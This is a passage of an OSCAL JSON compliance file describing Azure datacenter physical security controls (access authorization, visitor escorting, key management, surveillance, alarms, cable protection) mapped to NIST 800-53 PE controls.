statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"6a16bdf6-7cf8-4d07-914d-372d72fff3fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-012"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.b","by-components":[{"uuid":"f512e69b-763f-47e0-8202-a86b57248318","export":{"provided":[{"uuid":"a4062ecf-070b-4b2e-bf14-60d26c61ce03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-012"}],"description":"Access authorizations at Azure datacenters are managed through the Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the DCM team. Access to areas within the datacenter is granted based on the least privilege principle. Before a person can be granted physical access to a datacenter, they must have a DCAT request approved by the DCM team. The DCM team reviews the request for a valid business justification and for appropriate access levels. Upon arriving at the datacenter, the individual on the request must have their identification verified by the security against a Microsoft identification smart card or a valid government issued identification card. All accesses to Azure datacenter facilities are logged and audited."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"b7e4b0ce-9efd-45a7-b0d5-667a6ec7bfc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-013"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.c","by-components":[{"uuid":"4c836f7e-1301-4a23-b317-0ea75d5b935e","export":{"provided":[{"uuid":"8beabdbd-8640-4f08-9cd2-2ae37498f9a2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-013"}],"description":"Azure datacenters (leased and fully-managed) utilize physical access devices such as metal detectors, perimeter gates, electronic access smart card readers, biometric readers, man-traps/portals, anti-tailgate devices (at leased datacenter locations), and anti-pass back controls, as well as security officers to control access to datacenters. Azure datacenters do not contain areas that are designated as publicly accessible."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"4651051d-33a5-45c6-a576-c8d78c07a9da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-014"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.d","by-components":[{"uuid":"616009db-67c3-4b9d-bfe5-3dfe0439a9fd","export":{"provided":[{"uuid":"453e9351-2871-4a18-b190-8a4386a622da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-014"}],"description":"All visitors that have approved access to the datacenter are designated as \"Escort Only\" on their badges and are always required to remain with their escorts. Escorted visitors do not have any access levels granted to them and can only travel on the access of their escorts. Escorts monitor all activities of their visitor while in the datacenter."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"58b21dfc-5524-4f0f-857f-42f11a4cc6d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-015"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.e","by-components":[{"uuid":"7bfb9d5d-cd9a-4b90-acc8-69c66b1be6b4","export":{"provided":[{"uuid":"95bb1a09-708f-4c32-bb37-615313d7ba32","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-015"}],"description":"Physical keys and temporary access badges are secured within the datacenter security operations center. Temporary access badges are stored within the access-controlled datacenter security operations center (SOC) and inventoried at the beginning and end of each shift. Security officers are staffed twenty-four (24) hours a day, seven (7) days a week. Physical keys are stored in an electronic key management system. These key management systems are linked to the physical access system and require a security officer's pin and access smart card to gain access. Keys are checked out to specific personnel by matching the person's access smart card to the physical key. A person must have the appropriate access level in DCAT to allow them to check out specific keys. Key inventories are conducted during each shift and keys are not allowed to be taken offsite."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"8141d10c-83bc-4eaa-b1a1-ec7850322ec8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-016"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.f","by-components":[{"uuid":"21e50e76-d11a-415a-9d04-bdf69f9898c6","export":{"provided":[{"uuid":"868f1e09-28d9-4ba1-ba7f-f5d5179b820a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-016"}],"description":"Physical access devices within Azure datacenters are inventoried on at least an annual basis. Keys and temporary access badges are inventoried multiple times a day at the beginning of each shift. Access smart card readers and similar access devices are linked to the physical security system where status is continuously represented."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7fc96323-6c43-47a6-acda-daad9b0c955d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-017"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.g","by-components":[{"uuid":"a1e78216-495f-4936-9870-2570c5fe7ec6","export":{"provided":[{"uuid":"7e8b3854-d984-4063-b9a8-0bc526a40aff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-017"}],"description":"Azure datacenters have procedures to implement in cases when an access smart card or key is lost or a person is terminated or transferred. In the event of a termination or transfer, the person's access is immediately removed from the DCAT system and their access smart card removed. This removes any datacenter access the person may have had. DCM teams also perform quarterly access reviews to validate the appropriateness of the datacenter access list in DCAT. Azure does not require the annual re-keying of locks because Azure datacenters do not use physical keys as a primary access method to the facility. Microsoft's policy is that no physical keys may leave the site, and no physical keys are permanently issued into individuals. The primary access methods at Azure datacenters are electronic access smart cards and biometrics, which allows for immediate revocation of access as required. Azure mitigates the control risks meant to be addressed by requiring annual re-keying through the primary implementation of electronic and biometric access controls, strict assignment of access levels and controlled distribution and management of keys. Additional security controls such as security patrols, video surveillance, and door alarms help mitigate this risk. Use of keys to open doors in lieu of access smart cards and/or biometrics where required within the datacenters results in a door alarm that requires the Control Room Supervisor to acknowledge the alarm and dispatch a security responder to investigate. If after an investigation a key was determined to be lost, Azure has procedures in place to determine appropriate action commensurate with the risk that the loss of that specific key has. These actions could require the re-keying of a single server rack or door and up to the re-keying of the entire datacenter facility."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"414b790a-114e-47c8-9166-0a767b11141b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-3.1","statements":[{"uuid":"aae1ea1d-5d6e-465d-89ed-d8c570f248df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-018"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3.1_smt","by-components":[{"uuid":"a270d820-eea4-4be5-96cb-a2811cdedbaf","export":{"provided":[{"uuid":"cd03d59a-2e25-4230-975d-bd2069c7d7c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-018"}],"description":"Access authorizations at Azure colocations are managed through the Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ffd8d5c8-07a9-4291-b452-a0260b6be2a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-4","statements":[{"uuid":"bb9a93db-3a19-4cdf-ad43-14b54b92bbc8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-019"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-4_smt","by-components":[{"uuid":"b800ee58-d341-414a-bc8e-938019a4c6db","export":{"provided":[{"uuid":"7506eb58-6cce-4768-b7a3-0bb118718d3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-019"}],"description":"Azure has implemented access control for transmission medium through the design and building of the Main Distribution Frame (MDF) rooms, Intermediate Distribution Frame (IDF) rooms, and colocations to protect information system distribution and transmission lines from accidental damage, disruption, and physical tampering. Access to MDF rooms, IDF rooms, and colocations require multifactor authentication via access smart card and biometrics. This ensures that access is restricted to only authorized personnel. Within the MDF and IDF, transmission and distribution lines are protected from accidental damage, disruption, and physical tampering using metal conduits, locked racks, cages, or cable trays. MDF and IDFs where networking equipment for Azure are housed are restricted access areas limited to cleared personnel who have passed an enhanced background screening or by individuals who are escorted while in the MDF and IDF by a person who is cleared and is an authorized government data escort. Signage on these MDF and IDF doors identifies the area as restricted access."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"962b47dc-2364-4a80-91c0-ac5c25af43ab","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-5","statements":[{"uuid":"e2db09ec-3fc0-4c66-a85d-21abf7168dc2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-020"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-5_smt","by-components":[{"uuid":"6d5a4bee-c350-474e-b393-d6a98443f8ce","export":{"provided":[{"uuid":"204c7185-271f-49f2-9a76-138a12c46bf2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-020"}],"description":"Azure datacenters do not have output devices (monitors, printers, audio devices, etc.) permanently connected to Azure assets or Azure shared assets. In addition to not having output devices, security officers perform physical walkthroughs of the facility multiple times per shift checking for items like doors being locked and racks being secured. Datacenter access is limited to people who have approved access authorizations. Colocations require multifactor authentication (access smart card and biometrics) to gain access."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"785938ab-5c93-4650-b8a7-d5be07c47ca6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-6","statements":[{"uuid":"43794e71-5903-4b72-aff0-064a8bf8e0c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-021"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6_smt.a","by-components":[{"uuid":"6c6a9da2-ff85-42ae-951f-c8ba6e597630","export":{"provided":[{"uuid":"85b75b65-1250-4a57-8a5f-02cff082edf6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-021"}],"description":"Physical access is monitored by implementing security devices and processes at the datacenters. Examples include twenty-four (24) hours a day, seven (7) days a week electronic monitoring of access control, alarm and video systems as well as twenty-four (24) hours a day, seven (7) days a week on site security patrols of the facility and grounds. A Control Room Supervisor is located in the datacenter security operations center at all times to provide monitoring of physical access in the datacenter._x000D_ _x000D_ CCTV is employed to monitor physical access to the datacenter and the information system. The CCTV is linked to the building alarm monitoring system to provide physical access monitoring of alarm points. Cameras are positioned to monitor perimeter doors, facility entrances and exits, all colocation rows and aisles, all racks, caged areas, high-security areas, shipping and receiving, facility external areas such as parking lots and other areas of the facility._x000D_ _x000D_ Security officers provide Azure with a security program staffed with highly-trained security officers capable of accomplishing the following:_x000D_ _x000D_ * Ensuring that only those personnel with proper authorization are allowed access to Azure Critical Infrastructure._x000D_ * Ensuring that personnel and visitors bringing equipment into and out of critical infrastructure facilities follow proper procedures to prevent intentional or unintentional loss._x000D_ * Constant patrolling allows officers to respond to, observe and report all incidents that may compromise the security at Microsoft. All incidents observed are reported to the Control Room Supervisor._x000D_ * Identify, escalate, and prevent criminal or unsafe activity, and be familiar with, adhere to, and enforce Azure policies and procedures._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"2a57f33b-e3b7-45b0-8799-8ca1c72e9920","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-022"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6_smt.b","by-components":[{"uuid":"b2dd3e40-f83a-40dd-8f71-0200ff1cac21","export":{"provided":[{"uuid":"c0ecc3c0-e549-4526-90f0-7d9c060c27bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-022"}],"description":"To access an Azure datacenter, a person must have a DCAT request approved by the Datacenter Management (DCM) team. In order to enter an Azure datacenter, a person must check-in with the datacenter security operations center (SOC) to facilitate/activate their access that is manned twenty-four (24) hours a day, seven (7) days a week. A person's physical access within the datacenter is reviewed continuously by the Control Room Supervisor in the SOC. The Control Room Supervisor monitors live camera feeds within the datacenter as well as the alarm monitoring system reports from all physical security access devices within the datacenter. Physical access is reported in the alarm monitoring system as approved or failed. Failed access results in an alarm status that requires action by the Control Room Supervisor. The Control Room Supervisor can dispatch a responder for further investigation if needed. The physical access logs in the alarm monitoring system are reviewed continuously but are also available log files for subsequent investigative review._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"31d4c25a-62d2-43b7-bbb9-3087a129e2bb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-023"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6_smt.c","by-components":[{"uuid":"14417ece-06ea-4c3b-bd98-b779356c528c","export":{"provided":[{"uuid":"6dce3a63-7d31-4f75-bb55-1bea7964052c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-023"}],"description":"Security events that occur within the datacenter are documented by the security team in a report called a Significant Event Notification (SEN). SEN reports capture the details of a security event and are required to be documented after an event occurs in order to capture details as accurately as possible._x000D_ _x000D_ SEN reports also contain the investigative analysis conducted in an After Action Report (AAR). AAR reports document the investigation into a security event and attempts to identify the root cause of the event. Additionally, any remediation actions or lessons learned are also included in the AAR, so that security procedures can be improved across the Azure datacenter security program._x000D_ _x000D_ In the event an incident impacts Azure assets or services, the Azure Security Response Team has procedures in place to respond to such incidents. For incidents requiring government notification, the Security Response Team coordinates with the service team to notify the government agency customer, US-CERT, and authorizing officials within US-CERT guidelines._x000D_ _x000D_ Azure Third-Party (Leased) Datacenters_x000D_ _x000D_ At leased datacenter locations, security events are communicated to the DCM team and escalated based on severity. The DCM team determines additional investigation or escalation._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"f07888ec-38dc-475a-809c-0984a6737e79","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-6.1","statements":[{"uuid":"9992b593-cb1e-4d0c-9dad-58c526e5b62b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-024"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6.1_smt","by-components":[{"uuid":"76e471bd-8520-4767-b06e-f8889b7a0cce","export":{"provided":[{"uuid":"cc86ff57-6790-43e7-ac7b-5806a31d2404","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-024"}],"description":"In addition to the twenty-four (24) hours a day, seven (7) days a week onsite security, Azure datacenters also utilize alarm monitoring systems. This provides real-time alarm and video monitoring. Datacenter doors have alarms that report when being opened or when they remain open passed a programmed length of time. Doors can also be programmed to display the live CCTV image when a door alarm is triggered. Additionally, the Control Room Supervisor constantly monitors a live feed of camera views from high security and high traffic areas. DCAT is also used to control access badge management (creation and modification). Access card and biometric hand geometry and fingerprint readers are programmed and monitored through the alarm monitoring system. Alarms are monitored and responded to by the Control Room Supervisor stationed twenty-four (24) hours a day, seven (7) days a week in the datacenter security operations center. During a response situation, the Control Room Supervisor utilizes cameras in the area of the incident being investigated to give the responder real-time information._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"e30e1d0a-df47-42d4-b8b9-a7bbff72fc2e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-6.4","statements":[{"uuid":"f343fcf5-6597-46a2-9cd0-c2f325d05b23","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-025"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6.4_smt","by-components":[{"uuid":"cae540de-d408-4ca5-a081-3121363e820d","export":{"provided":[{"uuid":"64b0106b-1508-43d7-b0ff-12a191723766","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-025"}],"description":"In addition to the physical access monitoring of the facility, Azure monitors the physical access to the information systems within the datacenters. All Microsoft's online services' equipment is placed in locations within datacenters where physical access is monitored. All colocation and Main Distribution Frame (MDF) rooms are protected by access control, alarms, and video._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"004344fc-a9bf-46fc-bc5f-042f2f58005c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-8","statements":[{"uuid":"0014439d-f3c3-4677-af06-cc22e45931c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-026"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8_smt.a","by-components":[{"uuid":"e7eddab0-0772-4a6c-bd45-eecb400ea10a","export":{"provided":[{"uuid":"233c5a27-1202-453d-ada7-ffdfd6916454","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-026"}],"description":"Visitor datacenter access records are maintained in DCAT in the form of approved DCAT requests . DCAT requests can only be approved by the Datacenter Management (DCM) team. All visitor access requests to Azure datacenters is recorded in DCAT and is available for future possible investigations. Visitors are always required to be escorted and are not granted any access to Azure datacenters. The escort's access within the datacenter is logged within Lenel OnGuard Alarm Monitoring System and, if necessary, can be correlated to the visitor for future review. Azure Third-Party (Leased) Datacenters For leased datacenters, Azure is provided monthly with a log of all access attempts to the Microsoft areas. Visitor access records processed for both owned and leased Azure datacenters are retained for 3 years."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"616b59aa-30c7-4c19-944e-0668b1a6552f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-027"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8_smt.b","by-components":[{"uuid":"f5d3ecba-316f-4321-a3bd-b630bc2a4bee","export":{"provided":[{"uuid":"548d1ceb-3100-4bc3-a219-6a270c433cde","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-027"}],"description":"Visitors are always required to be escorted. The escort's access within the datacenter is logged within the alarm monitoring system and if necessary can be correlated to the visitor for future review . Visitor access is being reviewed continuously by the assigned escort and by the control room supervisor via CCTV and the alarm monitoring system. Visitors are not provided with access and must always be accompanied by their escorts. Visitors with an approved DCAT access request have their access request reviewed at the time their identification is verified against a form of a valid government issued ID or Microsoft issued smart card. Visitors are always escorted while at the datacenter. Visitors approved for escorted access are issued a sticky badge. Additionally, when a visitor concludes their visit by returning their sticky badge to the CRS, the CRS terminates the visitor's DCAT access record during a final review. Azure maintains visitor access records within the DCAT database for possible future investigations. Additionally, visitors assigned a Visitor or Tour access level in DCAT are always required to have an escort present. The escort is responsible for reviewing the actions and access of their visitor during their visit to the datacenter. Azure Third-Party (Leased) Datacenters: At leased datacenter locations, visitors to Microsoft areas are always required to be escorted and wear a badge that indicates their visitor status. The escort is responsible for reviewing the actions and access of their visitor during their visit to the datacenter."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"6e49d5bb-75f3-48d5-8179-d7ba4f2a2bff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-028"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8_smt.c","by-components":[{"uuid":"10f3d460-ed6b-424c-8d74-4c55ab80a8be","export":{"provided":[{"uuid":"ffc7ad03-78f6-433a-9c56-7aa1d954dff5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-028"}],"description":"Visitor datacenter access records are maintained in DCAT in the form of approved DCAT requests . DCAT requests can only be approved by the Datacenter Management (DCM) team. All visitor access requests to Azure datacenters is recorded in DCAT and is available for future possible investigations. Visitors are always required to be escorted and are not granted any access to Azure datacenters. The escort's access within the datacenter is logged within Lenel OnGuard Alarm Monitoring System and, if necessary, can be correlated to the visitor for future review. Anomalies in visitor access records are reported to Datacenter Management and Security Teams for investigation. Azure Third-Party (Leased) Datacenters: For leased datacenters, Azure is provided monthly with a log of all access attempts to the Microsoft areas. Visitor access records processed for both owned and leased Azure datacenters are retained for 3 years. Anomalies in visitor access records are reported to Datacenter Management and Security Teams for investigation."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"485c9865-cc0f-45c6-b480-8504cb664468","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-8.1","statements":[{"uuid":"309f8fff-7115-4462-bc90-0b9deb76d7b6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-029"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8.1_smt","by-components":[{"uuid":"332e7ee7-2813-48de-8fda-7ea53bce5159","export":{"provided":[{"uuid":"7caed60f-9b6b-4057-9643-0122fa2bb4f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-029"}],"description":"Datacenter access records are maintained in DCAT in the form of approved DCAT requests. DCAT requests can only be approved by the Datacenter Management (DCM) team. Access levels within the datacenter are assigned and managed within DCAT. Datacenter access is reviewed quarterly. All access to Azure datacenters is recorded in DCAT and is available for future possible investigations. Visitors are always required to be escorted. The escort's access within the datacenter is logged within the alarm monitoring system and if necessary can be correlated to the visitor for future review. Visitor access is being reviewed continuously by the assigned escort and by the control room supervisor via CCTV and the alarm monitoring system. Visitors are not provided with access and must always be accompanied by their escorts._x000D_ _x000D_ Datacenter access records are maintained in DCAT in the form of approved DCAT requests. DCAT is the automated mechanism used to maintain and review visitor access records. DCAT requests can only be approved by the DCM team. Access levels within the datacenter are assigned and managed within DCAT. Datacenter access is reviewed quarterly. All access to Azure datacenters is recorded in DCAT and is available for future possible investigations. Visitors are always required to be escorted. The escort's access within the datacenter is logged within the alarm monitoring system and if necessary can be correlated to the visitor for future review. Visitor access is being reviewed continuously by the assigned escort and by the control room supervisor via CCTV and the alarm monitoring system. Visitors are not provided with access and must always be accompanied by their escorts._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"bea3b483-ffd0-431a-9fc8-f6ba23f5b05c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-9","statements":[{"uuid":"e80c5900-cdad-4e99-8dd3-8cec8368d64b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-9_smt","by-components":[{"uuid":"361a3754-e9e2-495e-9abd-0f23517dc4d1","export":{"provided":[{"uuid":"ab73fb27-d239-43ab-abb4-ed5f77ff1a08","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-030"}],"description":"Azure provides protective spaces and appropriate labeling for cables. Azure equipment such as cables, electrical lines, and backup generators must be placed in environments which have been engineered to be protected from environmental risks such as theft, fire, explosives, smoke, water, dust, vibration, earthquake, harmful chemicals, electrical interference, power outages, electrical disturbances (spikes). All portable online services' assets (e.g. racks, servers, network devices) must be locked or fastened in place to provide protection against theft or movement damage. Power and information system cables within any Azure environment are labeled appropriately and protected against interception or damage. Power and information system cables are separated from each other at all points within an environment to avoid interference. Power cables are run under the floors, overhead in cable trays and within cabinets for protection from moving parts and accidental damage. All electrical spaces are behind card readers or additional key locks as appropriate. Access hallways as well as exterior entrances and equipment yards approaching the protective spaces are all monitored via video surveillance._x000D_ _x000D_ Power systems also utilize redundancy as a form of protection. Datacenters utilize multiple power/utility feeds into the facility as well as redundant configurations of generators and UPS systems. Generator and UPS system components undergo regular maintenance procedures to maintain the systems in proper working order._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ad1a1aee-9f42-48e0-9854-71a2c5f928a5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-10","statements":[{"uuid":"bc6f03b5-3e1e-401f-ac06-fd67935ab1de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-10_smt.a","by-components":[{"uuid":"4963ed8a-95b7-4b2b-90f6-c7de688a6715","export":{"provided":[{"uuid":"acfca9f7-7473-4dfc-a2d5-949129930f3d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-031"}],"description":"Azure has installed Emergency Power Off (EPO) Buttons in locations within the datacenter only as required by local fire code. Azure Third-Party (Leased) Datacenters: Azure leased datacenters may have EPO buttons installed at the colocation rooms at the discretion of the colocation provider, but this is not currently required by Microsoft."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"8c38fa9e-158a-4bc0-a51f-6557d5837956","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-10_smt.b","by-components":[{"uuid":"8204caad-069b-4863-849e-72203a5e19a2","export":{"provided":[{"uuid":"3a328442-35f7-4722-a717-347be66988f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-032"}],"description":"When present, EPO buttons are strategically placed to allow for activation in emergency situations. EPO 